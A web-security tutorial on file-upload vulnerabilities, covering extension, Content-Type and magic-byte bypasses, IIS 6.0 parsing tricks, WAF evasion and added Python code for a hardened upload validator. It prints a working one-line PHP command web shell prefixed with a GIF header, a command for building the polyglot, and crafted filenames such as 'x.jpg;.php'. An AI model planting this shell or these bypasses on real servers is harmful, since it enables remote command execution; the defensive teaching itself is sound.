A Brief Look at Web Security: File Upload
2022-07-06 15:35:00 [InfoQ]
Overview
Causes and impact of the vulnerability
1. Local validation (front-end validation): checks done in the browser's JavaScript are not a control at all; the request can be edited after the check has run.
2. Server-side validation and bypasses
2.1 File extension: a denylist of extensions is bypassed with a variant the list does not name; the checks below then decide whether the file still gets executed.
3. File type validation
3.1 File header (magic-byte) checks: the first bytes of the file identify its format (e.g. GIF89a)
JPEG: FF D8 FF
PNG: 89 50 4E 47 0D 0A 1A 0A
GIF: 47 49 46 38 39 61 ("GIF89a")
A check that only looks at the leading bytes is defeated by putting a real image header in front of a web shell. The payload file (key quoted so it also runs on PHP 8, where an unquoted constant is an error):

```php
GIF89a
<?php echo `$_REQUEST['cmd']`;
?>
```

On Windows the image and the payload are concatenated byte for byte from cmd: `copy 1.jpg/b+a.txt test.php` (the `/b` makes the copy binary, so nothing is altered or truncated).
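The following is an added example, not code from the original post: it builds the GIF89a + PHP polyglot described above in memory (the equivalent of `copy 1.jpg/b+a.txt test.php`) and shows that a magic-byte check alone accepts it, while a scan of the whole body for script open tags does not. The sample GIF bytes and the list of script markers are constructed for the example.

```python
# Added example, not from the original post: the GIF89a + PHP polyglot and
# why a magic-byte check alone does not stop it.

# Magic bytes for the three formats listed in the post.
MAGIC = {
    "jpeg": bytes.fromhex("FFD8FF"),
    "png": bytes.fromhex("89504E470D0A1A0A"),
    "gif": b"GIF89a",  # 47 49 46 38 39 61
}

# The post's web shell, key quoted so it also runs on PHP 8.
WEBSHELL = b"<?php echo `$_REQUEST['cmd']`; ?>"

# Script open tags to look for anywhere in the body (assumed list).
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<%", b"<script")


def make_polyglot(image: bytes, payload: bytes) -> bytes:
    """Byte-wise concatenation, exactly what `copy image/b+payload out` does."""
    return image + payload


def sniff_type(data: bytes):
    """Return the format whose magic bytes the data starts with, else None."""
    for name, magic in MAGIC.items():
        if data.startswith(magic):
            return name
    return None


def header_check_passes(data: bytes, expected: str) -> bool:
    """The check section 3.1 describes: look only at the leading bytes."""
    return sniff_type(data) == expected


def contains_script(data: bytes) -> bool:
    """Stronger content check: any script open tag anywhere in the file."""
    lower = data.lower()
    return any(marker in lower for marker in SCRIPT_MARKERS)


# Constructed sample: a bare GIF89a header plus a 1x1 logical screen
# descriptor stands in for 1.jpg; it is not a renderable image.
SAMPLE_GIF = MAGIC["gif"] + b"\x01\x00\x01\x00\x00\x00\x00"
POLYGLOT = make_polyglot(SAMPLE_GIF, WEBSHELL)

if __name__ == "__main__":
    print("header check on polyglot:", header_check_passes(POLYGLOT, "gif"))
    print("script scan on polyglot: ", contains_script(POLYGLOT))
    print("script scan on clean gif:", contains_script(SAMPLE_GIF))
```

The header check says "gif" for the polyglot because the first six bytes really are a GIF header; everything after them is ignored. Scanning the full body for `<?php`, `<%` and the like catches this particular payload, but a determined attacker can split or encode the tag, so the robust defence is to re-encode the upload with an image library and store only the re-encoded output, which drops any trailing bytes.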
3.2 Content-Type checks: the Content-Type of a multipart part is set by the client, so an attacker simply rewrites it to image/jpeg in the request while keeping the .php body.
4. Content and other checks
4.1 Logic flaws: race conditions (the file is written to disk first and only then checked and deleted, so for a moment it exists and can be requested, much like a file the system is still holding open)
4.2 Directory naming (the stored path or filename is taken from the request)
5. Other vulnerabilities
Script and function vulnerabilities (CVEs)
CVE-2017-12615: Apache Tomcat, HTTP PUT with the default servlet's readonly=false lets a JSP be written to the web root and executed
CVE-2015-5254: Apache ActiveMQ, unsafe deserialization of a JMS ObjectMessage leading to remote code execution
CVE-2019-2618: Oracle WebLogic Server, arbitrary file upload by an authenticated user leading to remote code execution
6. Middleware (web server) parsing vulnerabilities
6.1 IIS 6.0+ parsing vulnerabilities
image/aa.jpg: a normal path, served as a static image
image.asp/aa.jpg: a directory whose name ends in .asp makes IIS 6.0 run every file inside it, here aa.jpg, through the ASP engine
image.asp;.jpg or xxx.asp;xxx.jpg: IIS 6.0 stops reading the filename at the semicolon, so the file is handled as image.asp / xxx.asp even though it was saved with a .jpg name
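As an added example (not part of the original post), the two IIS 6.0 rules above written as a detection check and run over a few constructed access-log lines, to flag uploaded "image" paths that IIS 6.0 would actually execute as ASP. Only the .asp extension the post mentions is modelled; the log format is assumed.

```python
# Added example, not from the original post: flag request paths that
# IIS 6.0 would hand to the ASP engine despite their image-looking names.
import re

ASP_EXT = ".asp"  # only the extension the post discusses


def iis6_executes_as_asp(path: str) -> bool:
    """Apply the two IIS 6.0 parsing rules from the post to a request path."""
    path = path.split("?", 1)[0]          # ignore the query string
    segments = path.split("/")
    dirs, leaf = segments[:-1], segments[-1]
    # Rule 1: any directory named *.asp makes every file under it ASP.
    if any(d.lower().endswith(ASP_EXT) for d in dirs):
        return True
    # Rule 2: IIS 6.0 stops reading the filename at the first ';'.
    effective = leaf.split(";", 1)[0]
    return effective.lower().endswith(ASP_EXT)


# Constructed sample log: "date time method path status".
SAMPLE_LOG = """\
2022-07-06 15:35:00 GET /image/aa.jpg 200
2022-07-06 15:35:01 GET /image.asp/aa.jpg 200
2022-07-06 15:35:02 GET /upload/xxx.asp;xxx.jpg 200
2022-07-06 15:35:03 GET /upload/photo.jpg 200
"""

LINE_RE = re.compile(r"\S+ \S+ (\S+) (\S+) \d+$")


def suspicious_paths(log: str) -> list:
    """Return every logged path that IIS 6.0 would execute as ASP."""
    hits = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m and iis6_executes_as_asp(m.group(2)):
            hits.append(m.group(2))
    return hits


if __name__ == "__main__":
    for p in suspicious_paths(SAMPLE_LOG):
        print("would run as ASP:", p)
```

The same two rules are what an upload handler on IIS 6.0 has to neutralise: never let a request choose the directory name (rule 1), and reject or rewrite any filename containing a semicolon (rule 2).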
7. WAF bypass
7.1 Data overflow (padding with junk data): a large block of filler placed before the filename field so that the WAF's inspection window is exhausted before it reaches the interesting part
7.2 Symbol mutation (' " ;): for example `x.jpg;.php`
7.3 Data truncation (%00, ;, newline): the filename is cut or broken up so that the WAF and the application read different names, e.g. a multipart filename split across lines as `x.\np\nh\np`
7.4 Repeated data: the same field (e.g. filename=) sent more than once so that the WAF inspects one copy and the application uses the other
8. Defenses
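An added example, not code from the original post, of how the defences implied by sections 2 to 7 look in one upload validator: a naive check of the kind the bypasses above defeat, beside a hardened version that applies an extension allow-list, rejects the characters used in 7.2/7.3, checks Content-Type and magic bytes against each other, scans the body for script tags, and replaces the client's name with a random one. The list of executable extensions, the script markers and the sample bodies are assumptions constructed for the example.

```python
# Added example, not from the original post: naive vs. hardened upload check.
import os
import re
import secrets

# Allow-list: extension -> Content-Type it must arrive with.
ALLOWED = {"jpg": "image/jpeg", "jpeg": "image/jpeg",
           "png": "image/png", "gif": "image/gif"}
# Leading bytes each allowed type must start with ("GIF8" covers GIF87a/89a).
MAGIC = {"jpg": bytes.fromhex("FFD8FF"), "jpeg": bytes.fromhex("FFD8FF"),
         "png": bytes.fromhex("89504E470D0A1A0A"), "gif": b"GIF8"}
# Assumed list of extensions a server might execute; rejected anywhere in the name.
EXEC_EXTS = {"php", "php3", "php5", "phtml", "asp", "aspx", "asa", "cer",
             "jsp", "jspx"}
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<%", b"<script")


def naive_check(filename: str, content_type: str) -> bool:
    """The kind of server-side check sections 2 and 3.2 bypass: trust the
    tail of the client's filename and the client-supplied Content-Type."""
    return (filename.lower().endswith(tuple("." + e for e in ALLOWED))
            and content_type.startswith("image/"))


def validate_upload(filename: str, content_type: str, data: bytes) -> str:
    """Apply every check from the post in order and return a server-chosen
    name; raise ValueError on the first failure."""
    # Drop any directory part the client sent (either separator style).
    name = os.path.basename(filename.replace("\\", "/"))
    # 7.2 / 7.3: NUL, newline, other controls, ';', quotes and '%' (encoded
    # NUL) have no business in an image filename.
    if not name or re.search(r"[\x00-\x1f\x7f;'\"%]", name):
        raise ValueError("illegal character in filename")
    parts = name.lower().split(".")
    # 2.1: exact allow-list on the last extension, and no executable
    # extension anywhere else in the name (x.php.jpg).
    if len(parts) < 2 or any(p in EXEC_EXTS for p in parts[1:]):
        raise ValueError("executable extension present")
    ext = parts[-1]
    if ext not in ALLOWED:
        raise ValueError("extension not allowed")
    # 3.2: Content-Type must agree with the extension (parameters ignored).
    if content_type.split(";", 1)[0].strip().lower() != ALLOWED[ext]:
        raise ValueError("Content-Type does not match extension")
    # 3.1: magic bytes must agree with the extension.
    if not data.startswith(MAGIC[ext]):
        raise ValueError("file header does not match extension")
    # 4: the body must not carry a script tag after a valid header.
    if any(m in data.lower() for m in SCRIPT_MARKERS):
        raise ValueError("script tag inside image body")
    # 4.2: never reuse the client's name; random name, server-chosen extension.
    return f"{secrets.token_hex(16)}.{ext}"


def is_accepted(filename: str, content_type: str, data: bytes) -> bool:
    try:
        validate_upload(filename, content_type, data)
        return True
    except ValueError:
        return False


def save_upload(filename: str, content_type: str, data: bytes,
                dest_dir: str) -> str:
    """Validate first, write second, with O_EXCL so an existing name is never
    clobbered. dest_dir is assumed to be outside the web root, so there is no
    window (4.1) in which an unchecked file can be fetched by URL."""
    new_name = validate_upload(filename, content_type, data)
    path = os.path.join(dest_dir, new_name)
    with open(path, "xb") as fh:
        fh.write(data)
    return path


# Constructed sample bodies (headers only, not renderable images).
JPEG_OK = bytes.fromhex("FFD8FFE0") + b"\x00" * 8
PNG_OK = bytes.fromhex("89504E470D0A1A0A") + b"\x00" * 8
GIF_SHELL = b"GIF89a" + b"<?php echo `$_REQUEST['cmd']`; ?>"

if __name__ == "__main__":
    for fname, ctype, body in [("x.php\x00.jpg", "image/jpeg", JPEG_OK),
                               ("x.jpg;.php", "image/jpeg", JPEG_OK),
                               ("x.p\nh\np", "image/jpeg", JPEG_OK),
                               ("a.gif", "image/gif", GIF_SHELL),
                               ("a.png", "image/png", PNG_OK)]:
        print(repr(fname), "naive:", naive_check(fname, ctype),
              "hardened:", is_accepted(fname, ctype, body))
```

The order matters: filename and header checks are cheap and run first, the body scan last. Because the stored name is random and the extension is the server's, neither the IIS 6.0 semicolon trick nor a WAF bypass of the filename field can change how the stored file is parsed, and serving uploads from a directory with script execution disabled closes what the validator cannot see.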